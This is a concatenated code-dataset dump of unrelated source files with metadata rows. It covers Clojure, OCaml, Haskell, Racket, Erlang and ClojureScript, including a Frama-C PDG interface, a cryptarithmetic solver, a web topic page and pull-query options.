{:elemwise-datatype (fn [item#] ~datatype)}
dtype-proto/PECount
{:ecount (fn [item#] 1)}
dtype-proto/PConstantTimeMinMax
{:has-constant-time-min-max? (constantly true)
:constant-time-min identity
:constant-time-max identity}
dtype-proto/PToReader
{:convertible-to-reader? (constantly false)
:->reader (fn [item#]
(const-reader item# 1))})))
(implement-scalar-primitive Boolean Boolean/TYPE :boolean)
(implement-scalar-primitive Byte Byte/TYPE :int8)
(implement-scalar-primitive Short Short/TYPE :int16)
(implement-scalar-primitive Character Character/TYPE :char)
(implement-scalar-primitive Integer Integer/TYPE :int32)
(implement-scalar-primitive Long Long/TYPE :int64)
(implement-scalar-primitive Float Float/TYPE :float32)
(implement-scalar-primitive Double Double/TYPE :float64)
|
87535ad66264236cceed02eb1db1d90e1c391bca55d96085d3c9e13a8f2dfb4d | TrustInSoft/tis-interpreter | pdg_state.mli | Modified by TrustInSoft
(**************************************************************************)
(* *)
This file is part of Frama - C.
(* *)
Copyright ( C ) 2007 - 2015
CEA ( Commissariat à l'énergie atomique et aux énergies
(* alternatives) *)
(* *)
(* you can redistribute it and/or modify it under the terms of the GNU *)
Lesser General Public License as published by the Free Software
Foundation , version 2.1 .
(* *)
(* It is distributed in the hope that it will be useful, *)
(* but WITHOUT ANY WARRANTY; without even the implied warranty of *)
(* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the *)
(* GNU Lesser General Public License for more details. *)
(* *)
See the GNU Lesser General Public License version 2.1
for more details ( enclosed in the file licenses / LGPLv2.1 ) .
(* *)
(**************************************************************************)
exception Cannot_fold
open PdgTypes
(** Types data_state and Node.t come froms this module *)
val make : PdgTypes.LocInfo.t -> Locations.Zone.t -> data_state
val empty : data_state
val bottom: data_state
val add_loc_node :
data_state -> ?initializing:bool -> exact:bool -> Locations.Zone.t -> Node.t -> data_state
val add_init_state_input :
data_state -> Locations.Zone.t -> Node.t -> data_state
* Kind of ' join ' of the two states
but test before if the new state is included in ~old .
@return ( true , old U new ) if the result is a new state ,
( false , old ) if new is included in old .
but test before if the new state is included in ~old.
@return (true, old U new) if the result is a new state,
(false, old) if new is included in old. *)
val test_and_merge :
old:data_state -> data_state -> bool * data_state
(** @raise Cannot_fold if the state is Top *)
val get_loc_nodes :
data_state -> Locations.Zone.t -> (Node.t * Locations.Zone.t option) list * Locations.Zone.t option
val pretty : Format.formatter -> data_state -> unit
(* ~~~~~~~~~~~~~~~~~~~ *)
type states = data_state Cil_datatype.Stmt.Hashtbl.t
val store_init_state : states -> data_state -> unit
val store_last_state : states -> data_state -> unit
val get_init_state : states -> data_state
val get_stmt_state : states -> Cil_types.stmt -> data_state
val get_last_state : states -> data_state
| null | https://raw.githubusercontent.com/TrustInSoft/tis-interpreter/33132ce4a825494ea48bf2dd6fd03a56b62cc5c3/src/plugins/pdg/pdg_state.mli | ocaml | ************************************************************************
alternatives)
you can redistribute it and/or modify it under the terms of the GNU
It is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU Lesser General Public License for more details.
************************************************************************
* Types data_state and Node.t come froms this module
* @raise Cannot_fold if the state is Top
~~~~~~~~~~~~~~~~~~~ | Modified by TrustInSoft
This file is part of Frama - C.
Copyright ( C ) 2007 - 2015
CEA ( Commissariat à l'énergie atomique et aux énergies
Lesser General Public License as published by the Free Software
Foundation , version 2.1 .
See the GNU Lesser General Public License version 2.1
for more details ( enclosed in the file licenses / LGPLv2.1 ) .
exception Cannot_fold
open PdgTypes
val make : PdgTypes.LocInfo.t -> Locations.Zone.t -> data_state
val empty : data_state
val bottom: data_state
val add_loc_node :
data_state -> ?initializing:bool -> exact:bool -> Locations.Zone.t -> Node.t -> data_state
val add_init_state_input :
data_state -> Locations.Zone.t -> Node.t -> data_state
* Kind of ' join ' of the two states
but test before if the new state is included in ~old .
@return ( true , old U new ) if the result is a new state ,
( false , old ) if new is included in old .
but test before if the new state is included in ~old.
@return (true, old U new) if the result is a new state,
(false, old) if new is included in old. *)
val test_and_merge :
old:data_state -> data_state -> bool * data_state
val get_loc_nodes :
data_state -> Locations.Zone.t -> (Node.t * Locations.Zone.t option) list * Locations.Zone.t option
val pretty : Format.formatter -> data_state -> unit
type states = data_state Cil_datatype.Stmt.Hashtbl.t
val store_init_state : states -> data_state -> unit
val store_last_state : states -> data_state -> unit
val get_init_state : states -> data_state
val get_stmt_state : states -> Cil_types.stmt -> data_state
val get_last_state : states -> data_state
|
fe92a7fdd0374d5a8a7c4acb818068ebe6cca57906c4f4246468afe09ba443b6 | eckyputrady/haskell-scotty-realworld-example-app | Types.hs | module Feature.Comment.Types where
import ClassyPrelude
import Feature.User.Types
import Database.PostgreSQL.Simple.FromRow
import Platform.AesonUtil
type CommentId = Integer
type Slug = Text
data Comment = Comment
{ commentId :: CommentId
, commentCreatedAt :: UTCTime
, commentUpdatedAt :: UTCTime
, commentBody :: Text
, commentAuthor :: Profile
} deriving (Eq, Show)
newtype CreateComment = CreateComment
{ createCommentBody :: Text
} deriving (Eq, Show)
data CommentError
= CommentErrorNotFound CommentId
| CommentErrorSlugNotFound Slug
| CommentErrorNotAllowed CommentId
deriving (Eq, Show)
newtype CommentWrapper a = CommentWrapper { commentWrapperComment :: a } deriving (Eq, Show)
newtype CommentsWrapper a = CommentsWrapper { commentsWrapperComments :: [a] } deriving (Eq, Show)
$(commonJSONDeriveMany
[ ''Comment
, ''CreateComment
, ''CommentError
, ''CommentWrapper
, ''CommentsWrapper
])
instance FromRow Comment where
fromRow = Comment
<$> field
<*> field
<*> field
<*> field
<*> fromRow | null | https://raw.githubusercontent.com/eckyputrady/haskell-scotty-realworld-example-app/366a1eec021fb1bfcbc2d8e0485b59cbedba10e5/src/Feature/Comment/Types.hs | haskell | module Feature.Comment.Types where
import ClassyPrelude
import Feature.User.Types
import Database.PostgreSQL.Simple.FromRow
import Platform.AesonUtil
type CommentId = Integer
type Slug = Text
data Comment = Comment
{ commentId :: CommentId
, commentCreatedAt :: UTCTime
, commentUpdatedAt :: UTCTime
, commentBody :: Text
, commentAuthor :: Profile
} deriving (Eq, Show)
newtype CreateComment = CreateComment
{ createCommentBody :: Text
} deriving (Eq, Show)
data CommentError
= CommentErrorNotFound CommentId
| CommentErrorSlugNotFound Slug
| CommentErrorNotAllowed CommentId
deriving (Eq, Show)
newtype CommentWrapper a = CommentWrapper { commentWrapperComment :: a } deriving (Eq, Show)
newtype CommentsWrapper a = CommentsWrapper { commentsWrapperComments :: [a] } deriving (Eq, Show)
$(commonJSONDeriveMany
[ ''Comment
, ''CreateComment
, ''CommentError
, ''CommentWrapper
, ''CommentsWrapper
])
instance FromRow Comment where
fromRow = Comment
<$> field
<*> field
<*> field
<*> field
<*> fromRow | |
f14b09387df899299a8ea34d74a2a9a0e65d3af6740e07f156363c18dfaf9957 | larsen/wiz | Main.hs | module Main where
import Wiz.Types
import Wiz.Environment
import Wiz.Parser
import Wiz.EvalApply
import Text.Parsec (parse)
import Text.Printf
import System.Console.Haskeline
import Data.Maybe (fromMaybe)
import Control.Monad.IO.Class (liftIO)
main :: IO ()
main = do
prg <- loadProgram "init.scm"
env <- runProgram emptyEnv $ fromMaybe (Program []) prg
runInputT defaultSettings (loop env)
where
loop :: Environment -> InputT IO ()
loop env = do
input <- getInputLine "λ> "
case input of
Nothing -> return ()
Just input -> do
let res = parse pForm "(source)" input
case res of
Left err -> do
outputStrLn "Error!"
loop env
Right form -> do
(env', result) <- liftIO $ eval form env
case result of
Just result -> outputStrLn $ printf "%s" (show result)
Nothing -> outputStrLn $ printf "\n"
loop env'
| null | https://raw.githubusercontent.com/larsen/wiz/59b8c5fa5a1bde0a5ed83261599407e2d80efb25/src/Main.hs | haskell | module Main where
import Wiz.Types
import Wiz.Environment
import Wiz.Parser
import Wiz.EvalApply
import Text.Parsec (parse)
import Text.Printf
import System.Console.Haskeline
import Data.Maybe (fromMaybe)
import Control.Monad.IO.Class (liftIO)
main :: IO ()
main = do
prg <- loadProgram "init.scm"
env <- runProgram emptyEnv $ fromMaybe (Program []) prg
runInputT defaultSettings (loop env)
where
loop :: Environment -> InputT IO ()
loop env = do
input <- getInputLine "λ> "
case input of
Nothing -> return ()
Just input -> do
let res = parse pForm "(source)" input
case res of
Left err -> do
outputStrLn "Error!"
loop env
Right form -> do
(env', result) <- liftIO $ eval form env
case result of
Just result -> outputStrLn $ printf "%s" (show result)
Nothing -> outputStrLn $ printf "\n"
loop env'
| |
72e5944053d9e81baf5c117140a3dd72a581d6716e7b4a2f4b3d54dd6a6880e7 | mbutterick/typesetting | hacs-cryptarithmetic.rkt | #lang debug racket
(require "hacs.rkt" sugar/debug)
(module+ test (require rackunit))
(define (word-value d str)
(define xs (for/list ([c (in-string str)])
(dict-ref d (string->symbol (string c)))))
(for/sum ([(x idx) (in-indexed (reverse xs))])
(* x (expt 10 idx))))
(define (math-csp str)
(define input str)
(define words (map string-downcase (string-split input)))
(match-define (list terms ... sum) words)
(define vars (map string->symbol (remove-duplicates (for*/list ([word words]
[c word])
(string c)))))
(unless (<= (length vars) 10)
(raise-argument-error 'too-many-letters))
(define (not= x y) (not (= x y)))
(define math (make-csp))
(add-vars! math vars (range 0 10))
;; all letters have different values
(add-pairwise-constraint! math not= vars)
first letters can not be zero
(define firsts (remove-duplicates (map (compose1 string->symbol string car string->list) words) eq?))
(for ([first firsts])
(add-constraint! math positive? (list first)))
(add-constraint! math (λ args
(define dict (map cons vars args))
(= (apply + (map (λ (w) (word-value dict w)) terms)) (word-value dict sum))) vars)
math)
( solve ( math - csp " TWO TWO FOUR " ) )
#;(solve (math-csp "DUCK DUCK GOOSE"))
#;(solve (math-csp "TICK TICK BOOM"))
#;(solve (math-csp "SEND MORE MONEY"))
( solve ( math - csp " THIS THAT OTHER " ) ) | null | https://raw.githubusercontent.com/mbutterick/typesetting/93a682a1581f3c1564b6f39fc05a5fe1a09a5ccb/csp/csp/hacs-cryptarithmetic.rkt | racket | all letters have different values
(solve (math-csp "DUCK DUCK GOOSE"))
(solve (math-csp "TICK TICK BOOM"))
(solve (math-csp "SEND MORE MONEY")) | #lang debug racket
(require "hacs.rkt" sugar/debug)
(module+ test (require rackunit))
(define (word-value d str)
(define xs (for/list ([c (in-string str)])
(dict-ref d (string->symbol (string c)))))
(for/sum ([(x idx) (in-indexed (reverse xs))])
(* x (expt 10 idx))))
(define (math-csp str)
(define input str)
(define words (map string-downcase (string-split input)))
(match-define (list terms ... sum) words)
(define vars (map string->symbol (remove-duplicates (for*/list ([word words]
[c word])
(string c)))))
(unless (<= (length vars) 10)
(raise-argument-error 'too-many-letters))
(define (not= x y) (not (= x y)))
(define math (make-csp))
(add-vars! math vars (range 0 10))
(add-pairwise-constraint! math not= vars)
first letters can not be zero
(define firsts (remove-duplicates (map (compose1 string->symbol string car string->list) words) eq?))
(for ([first firsts])
(add-constraint! math positive? (list first)))
(add-constraint! math (λ args
(define dict (map cons vars args))
(= (apply + (map (λ (w) (word-value dict w)) terms)) (word-value dict sum))) vars)
math)
( solve ( math - csp " TWO TWO FOUR " ) )
( solve ( math - csp " THIS THAT OTHER " ) ) |
6c57bb817629d18b5e64cfc3865921e72b77ad172325f256e515530bcf44fefc | scrintal/heroicons-reagent | banknotes.cljs | (ns com.scrintal.heroicons.mini.banknotes)
(defn render []
[:svg {:xmlns ""
:viewBox "0 0 20 20"
:fill "currentColor"
:aria-hidden "true"}
[:path {:fillRule "evenodd"
:d "M1 4a1 1 0 011-1h16a1 1 0 011 1v8a1 1 0 01-1 1H2a1 1 0 01-1-1V4zm12 4a3 3 0 11-6 0 3 3 0 016 0zM4 9a1 1 0 100-2 1 1 0 000 2zm13-1a1 1 0 11-2 0 1 1 0 012 0zM1.75 14.5a.75.75 0 000 1.5c4.417 0 8.693.603 12.749 1.73 1.111.309 2.251-.512 2.251-1.696v-.784a.75.75 0 00-1.5 0v.784a.272.272 0 01-.35.25A49.043 49.043 0 001.75 14.5z"
:clipRule "evenodd"}]]) | null | https://raw.githubusercontent.com/scrintal/heroicons-reagent/572f51d2466697ec4d38813663ee2588960365b6/src/com/scrintal/heroicons/mini/banknotes.cljs | clojure | (ns com.scrintal.heroicons.mini.banknotes)
(defn render []
[:svg {:xmlns ""
:viewBox "0 0 20 20"
:fill "currentColor"
:aria-hidden "true"}
[:path {:fillRule "evenodd"
:d "M1 4a1 1 0 011-1h16a1 1 0 011 1v8a1 1 0 01-1 1H2a1 1 0 01-1-1V4zm12 4a3 3 0 11-6 0 3 3 0 016 0zM4 9a1 1 0 100-2 1 1 0 000 2zm13-1a1 1 0 11-2 0 1 1 0 012 0zM1.75 14.5a.75.75 0 000 1.5c4.417 0 8.693.603 12.749 1.73 1.111.309 2.251-.512 2.251-1.696v-.784a.75.75 0 00-1.5 0v.784a.272.272 0 01-.35.25A49.043 49.043 0 001.75 14.5z"
:clipRule "evenodd"}]]) | |
0cd36c0aba0a72559145d0cebb769b28309898791725085fb507076b11b611f4 | jorinvo/letsdo.events | topic.clj | (ns lde.web.pages.topic
(:refer-clojure :exclude [new])
(:require
[hiccup.core :refer [h]]
[reitit.core :refer [match->path]]
[reitit.ring :refer [get-match]]
[lde.web.components :as components]
[lde.web.util :refer [render escape-with-br multipart-image-to-data-uri goto-url]]
[lde.web.pages.event :as event-page]
[lde.core.topic :as topic]
[lde.core.image :as image]
[lde.core.user :as user]
[lde.core.event :as event]
[lde.core.invite :as invite]))
(defn new [req]
(let [path (-> req get-match match->path)]
(render
(:ctx req)
{:title "Setup New Topic"}
[:div
[:h1
"Setup new topic"]
[:form {:action path
:method "post"
:enctype "multipart/form-data"}
[:div.form-field
[:label [:div "Topic name" [:sup " *"]]
[:input.input-field {:type "text"
:name "name"
:required true}]]]
[:div.form-field
[:label [:div "Description"]
[:input.input-field {:type "text"
:name "description"}]]]
(components/image-upload)
[:div.form-field
[:div "Who can see this topic?" [:sup " *"]]
(for [[value {:keys [label]}] topic/visibilities]
[:label.radio
[:input {:type "radio"
:name "visibility"
:required true
:value value}]
label])]
[:div.form-field
[:div "This topic is about" [:sup " *"]]
(for [[value {label :plural}] topic/types]
[:label.radio
[:input {:type "radio"
:name "type"
:required true
:value value}]
label])]
[:button.btn {:type "submit"} "Create Topic"]
[:a.cancel {:href "/"} "Cancel"]]])))
(defn edit [{:keys [topic ctx]}]
(let [url (h (str "/for/" (:topic/slug topic)))]
(render
ctx
{:title (str "Edit Topic: " (h (:topic/name topic)))}
[:div
[:h1
"Edit Topic"]
[:form {:action (str url "/edit")
:method "post"
:enctype "multipart/form-data"}
[:div.form-field
[:label [:div "Topic name" [:sup " *"]]
[:input.input-field {:type "text"
:name "name"
:value (h (:topic/name topic))
:required true}]]]
[:div.form-field
[:label [:div "Description"]
[:input.input-field {:type "text"
:name "description"
:value (h (:topic/description topic))}]]]
(let [image (image/get-by-hash (:topic/image topic) ctx)]
(components/image-upload image))
[:span {} "Who can see this topic? "]
(for [[value {:keys [label]}] topic/visibilities]
[:label.radio
[:input {:type "radio"
:name "visibility"
:required true
:checked (= value (:topic/visibility topic))
:value value}]
label])
[:span {} "This topic is about: "]
(for [[value {label :plural}] topic/types]
[:label.radio
[:input {:type "radio"
:name "type"
:required true
:checked (= value (:topic/type topic))
:value value}]
label])
[:br]
[:button.btn {:type "submit"} "Update Topic"]
" "
[:a.cancel {:href url} "Cancel"]]
[:form {:action (str url "/delete") :method "post"}
[:button.btn.btn-small
{:type "submit"
:data-confirm "Are you sure you want to delete the topic?"}
"Delete Topic"]]])))
(defn overview [{:keys [topic ctx session]
{{:keys [whats]
:or {whats "upcoming"}} :query} :parameters}]
(let [title (:topic/name topic)
topic-url (h (str "/for/" (:topic/slug topic)))
topic-id (:id topic)
user-id (:id session)
events (case whats
"upcoming" (event/upcoming-by-topic topic-id ctx)
"new" (event/latest-by-topic topic-id ctx)
"mine" (event/mine-by-topic topic-id user-id ctx))
user (user/get-by-id ctx user-id)]
(render
ctx
{:title title
:description (str title " - " (:topic/description topic))}
[:div
[:a {:href topic-url}
[:h1 (h (:topic/name topic))]]
(when-let [image (image/get-by-hash (:topic/image topic) ctx)]
[:img.logo {:src (h image)
:alt "logo"}])
[:h2 (h (:topic/description topic))]
(if user
[:nav
[:a.nav-item {:href (h (str "/for/" (:topic/slug topic) "/new"))}
"New " (topic/singular topic)]
(when (topic/admin? ctx (:id topic) (:id user))
[:a.nav-item {:href (h (str "/for/" (:topic/slug topic) "/edit"))}
"Edit Topic"])
(when (topic/admin? ctx (:id topic) (:id user))
[:a.nav-item {:href (h (str "/for/" (:topic/slug topic) "/invites"))}
"Manage Invites"])
[:a.nav-item {:href (goto-url "/logout" topic-url)} "Logout"]]
[:nav
[:a.nav-item {:href (goto-url "/login" topic-url)} "Login"]
[:a.nav-item {:href (goto-url "/signup" topic-url)} "Signup"]])
[:nav
[:a.nav-item.select-item
{:href topic-url
:class (when (= whats "upcoming")
"active")}
(str "Upcoming " (topic/plural topic))]
[:a.nav-item.select-item
{:href (str topic-url "?whats=new")
:class (when (= whats "new")
"active")}
(str "New " (topic/plural topic))]
(when user
[:a.nav-item.select-item
{:href (str topic-url "?whats=mine")
:class (when (= whats "mine")
"active")}
(str "My " (topic/plural topic))])]
[:ul.overview-list (map #(vector :li (event-page/item % topic user ctx))
events)]])))
(defn list-invites [{:keys [topic ctx]}]
(let [title (str "Invites - " (:topic/name topic))
topic-url (h (str "/for/" (:topic/slug topic)))
topic-id (:id topic)
invites (invite/list-by-topic topic-id ctx)]
(render
ctx
{:title title}
[:div
[:a {:href topic-url}
[:h1 (h (:topic/name topic))]]
(when-let [image (image/get-by-hash (:topic/image topic) ctx)]
[:img.logo {:src (h image)
:alt "logo"}])
[:h2 "Invites"]
[:nav
[:a.nav-item {:href (h (str "/for/" (:topic/slug topic)))}
"All " (topic/plural topic)]
[:a.nav-item {:href (goto-url "/logout" topic-url)} "Logout"]]
[:form {:action (str topic-url "/invites") :method "post"}
[:div.form-field
[:label
[:div "Email" [:sup " *"]]
[:input.input-field {:type "email"
:name "email"
:required true}]]]
[:button.btn
{:type "submit"}
"Invite"]]
[:ul (for [invite invites]
[:li
(:invite/email invite)
[:form.inline {:action (str topic-url "/invites/" (:id invite) "/delete") :method "post"}
[:button.btn.btn-small
{:type "submit"}
"Revoke"]]])]])))
| null | https://raw.githubusercontent.com/jorinvo/letsdo.events/4cd2a5d401d37524c0bac265f48923ab5f91b220/src/lde/web/pages/topic.clj | clojure | (ns lde.web.pages.topic
(:refer-clojure :exclude [new])
(:require
[hiccup.core :refer [h]]
[reitit.core :refer [match->path]]
[reitit.ring :refer [get-match]]
[lde.web.components :as components]
[lde.web.util :refer [render escape-with-br multipart-image-to-data-uri goto-url]]
[lde.web.pages.event :as event-page]
[lde.core.topic :as topic]
[lde.core.image :as image]
[lde.core.user :as user]
[lde.core.event :as event]
[lde.core.invite :as invite]))
(defn new [req]
(let [path (-> req get-match match->path)]
(render
(:ctx req)
{:title "Setup New Topic"}
[:div
[:h1
"Setup new topic"]
[:form {:action path
:method "post"
:enctype "multipart/form-data"}
[:div.form-field
[:label [:div "Topic name" [:sup " *"]]
[:input.input-field {:type "text"
:name "name"
:required true}]]]
[:div.form-field
[:label [:div "Description"]
[:input.input-field {:type "text"
:name "description"}]]]
(components/image-upload)
[:div.form-field
[:div "Who can see this topic?" [:sup " *"]]
(for [[value {:keys [label]}] topic/visibilities]
[:label.radio
[:input {:type "radio"
:name "visibility"
:required true
:value value}]
label])]
[:div.form-field
[:div "This topic is about" [:sup " *"]]
(for [[value {label :plural}] topic/types]
[:label.radio
[:input {:type "radio"
:name "type"
:required true
:value value}]
label])]
[:button.btn {:type "submit"} "Create Topic"]
[:a.cancel {:href "/"} "Cancel"]]])))
(defn edit [{:keys [topic ctx]}]
(let [url (h (str "/for/" (:topic/slug topic)))]
(render
ctx
{:title (str "Edit Topic: " (h (:topic/name topic)))}
[:div
[:h1
"Edit Topic"]
[:form {:action (str url "/edit")
:method "post"
:enctype "multipart/form-data"}
[:div.form-field
[:label [:div "Topic name" [:sup " *"]]
[:input.input-field {:type "text"
:name "name"
:value (h (:topic/name topic))
:required true}]]]
[:div.form-field
[:label [:div "Description"]
[:input.input-field {:type "text"
:name "description"
:value (h (:topic/description topic))}]]]
(let [image (image/get-by-hash (:topic/image topic) ctx)]
(components/image-upload image))
[:span {} "Who can see this topic? "]
(for [[value {:keys [label]}] topic/visibilities]
[:label.radio
[:input {:type "radio"
:name "visibility"
:required true
:checked (= value (:topic/visibility topic))
:value value}]
label])
[:span {} "This topic is about: "]
(for [[value {label :plural}] topic/types]
[:label.radio
[:input {:type "radio"
:name "type"
:required true
:checked (= value (:topic/type topic))
:value value}]
label])
[:br]
[:button.btn {:type "submit"} "Update Topic"]
" "
[:a.cancel {:href url} "Cancel"]]
[:form {:action (str url "/delete") :method "post"}
[:button.btn.btn-small
{:type "submit"
:data-confirm "Are you sure you want to delete the topic?"}
"Delete Topic"]]])))
(defn overview [{:keys [topic ctx session]
{{:keys [whats]
:or {whats "upcoming"}} :query} :parameters}]
(let [title (:topic/name topic)
topic-url (h (str "/for/" (:topic/slug topic)))
topic-id (:id topic)
user-id (:id session)
events (case whats
"upcoming" (event/upcoming-by-topic topic-id ctx)
"new" (event/latest-by-topic topic-id ctx)
"mine" (event/mine-by-topic topic-id user-id ctx))
user (user/get-by-id ctx user-id)]
(render
ctx
{:title title
:description (str title " - " (:topic/description topic))}
[:div
[:a {:href topic-url}
[:h1 (h (:topic/name topic))]]
(when-let [image (image/get-by-hash (:topic/image topic) ctx)]
[:img.logo {:src (h image)
:alt "logo"}])
[:h2 (h (:topic/description topic))]
(if user
[:nav
[:a.nav-item {:href (h (str "/for/" (:topic/slug topic) "/new"))}
"New " (topic/singular topic)]
(when (topic/admin? ctx (:id topic) (:id user))
[:a.nav-item {:href (h (str "/for/" (:topic/slug topic) "/edit"))}
"Edit Topic"])
(when (topic/admin? ctx (:id topic) (:id user))
[:a.nav-item {:href (h (str "/for/" (:topic/slug topic) "/invites"))}
"Manage Invites"])
[:a.nav-item {:href (goto-url "/logout" topic-url)} "Logout"]]
[:nav
[:a.nav-item {:href (goto-url "/login" topic-url)} "Login"]
[:a.nav-item {:href (goto-url "/signup" topic-url)} "Signup"]])
[:nav
[:a.nav-item.select-item
{:href topic-url
:class (when (= whats "upcoming")
"active")}
(str "Upcoming " (topic/plural topic))]
[:a.nav-item.select-item
{:href (str topic-url "?whats=new")
:class (when (= whats "new")
"active")}
(str "New " (topic/plural topic))]
(when user
[:a.nav-item.select-item
{:href (str topic-url "?whats=mine")
:class (when (= whats "mine")
"active")}
(str "My " (topic/plural topic))])]
[:ul.overview-list (map #(vector :li (event-page/item % topic user ctx))
events)]])))
(defn list-invites [{:keys [topic ctx]}]
(let [title (str "Invites - " (:topic/name topic))
topic-url (h (str "/for/" (:topic/slug topic)))
topic-id (:id topic)
invites (invite/list-by-topic topic-id ctx)]
(render
ctx
{:title title}
[:div
[:a {:href topic-url}
[:h1 (h (:topic/name topic))]]
(when-let [image (image/get-by-hash (:topic/image topic) ctx)]
[:img.logo {:src (h image)
:alt "logo"}])
[:h2 "Invites"]
[:nav
[:a.nav-item {:href (h (str "/for/" (:topic/slug topic)))}
"All " (topic/plural topic)]
[:a.nav-item {:href (goto-url "/logout" topic-url)} "Logout"]]
[:form {:action (str topic-url "/invites") :method "post"}
[:div.form-field
[:label
[:div "Email" [:sup " *"]]
[:input.input-field {:type "email"
:name "email"
:required true}]]]
[:button.btn
{:type "submit"}
"Invite"]]
[:ul (for [invite invites]
[:li
(:invite/email invite)
[:form.inline {:action (str topic-url "/invites/" (:id invite) "/delete") :method "post"}
[:button.btn.btn-small
{:type "submit"}
"Revoke"]]])]])))
| |
513ac0fe55ee9ca79b6cbb49aa422b70586260d1f33a02a10500a45e7142e2d7 | ninenines/cowboy | charset_in_content_types_provided_h.erl | %% This module has a media type provided with an explicit charset.
-module(charset_in_content_types_provided_h).
-export([init/2]).
-export([content_types_provided/2]).
-export([charsets_provided/2]).
-export([get_text_plain/2]).
init(Req, Opts) ->
{cowboy_rest, Req, Opts}.
content_types_provided(Req, State) ->
{[
{{<<"text">>, <<"plain">>, [{<<"charset">>, <<"utf-8">>}]}, get_text_plain}
], Req, State}.
charsets_provided(Req, State) ->
{[<<"utf-16">>, <<"iso-8861-1">>], Req, State}.
get_text_plain(Req, State) ->
{<<"This is REST!">>, Req, State}.
| null | https://raw.githubusercontent.com/ninenines/cowboy/8795233c57f1f472781a22ffbf186ce38cc5b049/test/handlers/charset_in_content_types_provided_h.erl | erlang | This module has a media type provided with an explicit charset. |
-module(charset_in_content_types_provided_h).
-export([init/2]).
-export([content_types_provided/2]).
-export([charsets_provided/2]).
-export([get_text_plain/2]).
init(Req, Opts) ->
{cowboy_rest, Req, Opts}.
content_types_provided(Req, State) ->
{[
{{<<"text">>, <<"plain">>, [{<<"charset">>, <<"utf-8">>}]}, get_text_plain}
], Req, State}.
charsets_provided(Req, State) ->
{[<<"utf-16">>, <<"iso-8861-1">>], Req, State}.
get_text_plain(Req, State) ->
{<<"This is REST!">>, Req, State}.
|
98e5d6ad0f16289f414f0e2956a32c9562dd6e585a2762c5424536f9ffaf7278 | flybot-sg/lasagna-pull | option.cljc | Copyright 2022 , Flybot Pte . Ltd.
Apache License 2.0 , /
(ns sg.flybot.pullable.core.option
"support for decorate query options"
(:require [sg.flybot.pullable.util :as u :refer [data-error]]))
(defmulti apply-post
"create a post processor by ::pp-type, returns a function takes
k-v pair, returns the same shape of data"
:proc/type)
(defn assert-arg!
"An error that represent apply-post illegal argument."
[pred arg]
(when-not (pred (:proc/val arg))
(throw (ex-info "illegal argument" arg))))
(defmethod apply-post :default
[arg]
(assert-arg! (constantly false) arg))
^:rct/test
(comment
throws= > > { : error / class clojure.lang . ExceptionInfo }
)
# # # : when option
;; Takes a pred function as its argument (:proc/val)
;; when the return value not fullfil `pred`, it is not included in result.
(defmethod apply-post :when
[arg]
(let [{pred :proc/val} arg]
(assert-arg! fn? arg)
(fn [[k v]]
[k (when (pred v) v)])))
^:rct/test
(comment
throws= > > { : error / class clojure.lang . ExceptionInfo }
;;when everything ok, it returns the original data
= > [: a 1 ]
((apply-post {:proc/type :when :proc/val odd?}) [:a 0]) ;=> [:a nil]
)
# # # : not - found option
;; Takes any value as its argument (:proc/val)
;; When a value not found, it gets replaced by not-found value
(defmethod apply-post :not-found
[{:proc/keys [val]}]
(fn [[k v]]
[k (or v val)]))
^:rct/test
(comment
= > [: a 1 ]
((apply-post {:proc/type :not-found :proc/val :default}) [:a nil]) ;=> [:a :default]
)
# # # : with option
;; Takes a vector of args as this option's argument (:proc/val)
;; Requires value being a function, it applies the vector of args to it,
;; returns the return value as query result.
(defmethod apply-post :with
[arg]
(let [{args :proc/val} arg]
(assert-arg! vector? arg)
(fn [[k f]]
[k (if (fn? f)
(apply f args)
(data-error f k "value must be a function"))])))
^:rct/test
(comment
throws= > > { : error / class clojure.lang . ExceptionInfo }
((apply-post {:proc/type :with :proc/val [3]}) [:a 3]) ;=>> [:a u/error?]
= > [: a 4 ]
)
# # # : batch option
;; Takes a vector of vector of args as this options's argument.
only for function value .
;; query result will have a value of a vector of applying resturn value.
(defmethod apply-post :batch
[arg]
(assert-arg! #(and (vector? %) (every? vector? %)) arg)
(let [{args-vec :proc/val} arg]
(fn [[k f]]
[k (if-not (fn? f)
(data-error f k "value must be a function")
(map #(apply f %) args-vec))])))
^:rct/test
(comment
throws= > > { : error / class clojure.lang . ExceptionInfo }
= > [: a [ 4 5 ] ]
((apply-post {:proc/type :batch :proc/val [[3] [4]]}) [:a 3]) ;=>> [:a u/error?]
)
# # # : seq option ( Pagination )
;; Takes a pair of numbers as this option's argument.
from : number ] [: count : number ] ]
Appliable only for seq query .
;; query result has a value of a sequence of truncated sequence.
(defmethod apply-post :seq
[arg]
(assert-arg! vector? arg)
(let [[from cnt] (:proc/val arg)
from (or from 0)
cnt (or cnt 0)]
(fn [[k v]]
[k (if-not (seqable? v)
(data-error v k "seq option can only be used on sequences")
(->> v (drop from) (take cnt)))])))
^:rct/test
(comment
((apply-post {:proc/type :seq :proc/val 3}) [:a inc]) ;throws=>> {:error/message #"illegal argument"}
((apply-post {:proc/type :seq :proc/val [1 3]}) [:a (range 8)]) ;=> [:a [1 2 3]]
((apply-post {:proc/type :seq :proc/val [1 3]}) [:a 1]) ;=>> [:a u/error?]
)
# # # : watch option
;; Takes an function as the argument (:proc/val):
;; [:=> [:catn [:old-value :any] [:new-value :any]] :any]
;; returns `nil` when your do want to watch it anymore.
;; Can watch on a IRef value
(def watchable?
"pred if `x` is watchable"
(fn [x]
#?(:clj (instance? clojure.lang.IRef x)
:cljs (satisfies? IDeref x))))
(defmethod apply-post :watch
[arg]
(assert-arg! fn? arg)
(let [f (:proc/val arg)
w-k ::watch
watcher (fn [_ watched old-value new-value]
(when (nil? (f old-value new-value))
(remove-watch watched w-k)))]
(fn [[k v]]
(if (watchable? v)
(do (add-watch v w-k watcher)
[k @v])
[k (data-error v k "watch option can only apply to an watchable value")]))))
^:rct/test
(comment
throws= > > { : error / class clojure.lang . ExceptionInfo }
((apply-post {:proc/type :watch :proc/val identity}) [:a inc]) ;=>> [:a u/error?]
(def a (atom 0))
(def b (atom 0))
((apply-post {:proc/type :watch :proc/val (fn [_ v] (reset! b v))}) [:a a]);=> [:a 0]
(reset! a 5)
= > 5
) | null | https://raw.githubusercontent.com/flybot-sg/lasagna-pull/b163e44fe47414040f54782a1787a6d0ba2a2b00/src/sg/flybot/pullable/core/option.cljc | clojure | Takes a pred function as its argument (:proc/val)
when the return value not fullfil `pred`, it is not included in result.
